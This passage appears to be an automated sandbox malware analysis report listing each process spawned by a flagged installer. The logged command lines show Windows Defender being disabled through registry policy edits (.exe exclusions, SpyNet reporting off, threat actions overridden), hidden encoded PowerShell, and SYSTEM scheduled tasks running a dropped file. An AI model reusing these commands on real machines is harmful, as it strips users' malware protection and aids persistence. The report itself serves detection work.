                            Commandline:.\Install.exe /S /site_id "525403"
                            Imagebase:0x920000
                            File size:7164928 bytes
                            MD5 hash:C58B38377096B7C07958599E0E0C361A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 65%, ReversingLabs
                            Reputation:low

                            General

                            Target ID:3
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\forfiles.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
                            Imagebase:0x960000
                            File size:41472 bytes
                            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:4
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:5
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\forfiles.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
                            Imagebase:0x960000
                            File size:41472 bytes
                            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:6
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:7
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:8
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:9
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:10
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:11
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:12
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:13
                            Start time:16:11:11
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            Imagebase:0x7ff7c72c0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:14
                            Start time:16:11:12
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:15
                            Start time:16:11:12
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /run /I /tn "goSRLihgj"
                            Imagebase:0xcd0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:16
                            Start time:16:11:12
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:17
                            Start time:16:11:13
                            Start date:31/12/2022
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                            Imagebase:0x7ff6369d0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:18
                            Start time:16:11:13
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:19
                            Start time:16:11:13
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /DELETE /F /TN "goSRLihgj"
                            Imagebase:0xcd0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:20
                            Start time:16:11:14
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61e220000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:21
                            Start time:16:11:17
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F
                            Imagebase:0xcd0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:22
                            Start time:16:11:17
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:23
                            Start time:16:11:19
                            Start date:31/12/2022
                            Path:C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe UB /site_id 525403 /S
                            Imagebase:0xdf0000
                            File size:7164928 bytes
                            MD5 hash:C58B38377096B7C07958599E0E0C361A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 65%, ReversingLabs

                            General

                            Target ID:24
                            Start time:16:11:21
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                            Imagebase:0x970000
                            File size:430592 bytes
                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            General

                            Target ID:25
                            Start time:16:11:21
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:26
                            Start time:16:11:27
                            Start date:31/12/2022
                            Path:C:\Windows\System32\gpupdate.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\gpupdate.exe" /force
                            Imagebase:0x7ff62ab60000
                            File size:29184 bytes
                            MD5 hash:47C68FE26B0188CDD80F744F7405FF26
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:27
                            Start time:16:11:28
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            General

                            Target ID:30
                            Start time:16:11:29
                            Start date:31/12/2022
                            Path:C:\Windows\System32\gpscript.exe
                            Wow64 process (32bit):false
                            Commandline:gpscript.exe /RefreshSystemParam
                            Imagebase:0x7ff612990000
                            File size:44544 bytes
                            MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:31
                            Start time:16:11:48
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:32
                            Start time:16:11:48
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:33
                            Start time:16:11:49
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:34
                            Start time:16:11:50
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:35
                            Start time:16:11:51
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:36
                            Start time:16:11:51
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:37
                            Start time:16:11:52
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:38
                            Start time:16:11:52
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:39
                            Start time:16:11:52
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:40
                            Start time:16:11:53
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:41
                            Start time:16:11:53
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:42
                            Start time:16:11:54
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:44
                            Start time:16:11:54
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:46
                            Start time:16:11:55
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:47
                            Start time:16:11:55
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:48
                            Start time:16:11:55
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:49
                            Start time:16:11:56
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:50
                            Start time:16:11:56
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:51
                            Start time:16:11:57
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:52
                            Start time:16:11:57
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            General

                            Target ID:53
                            Start time:16:11:58
                            Start date:31/12/2022
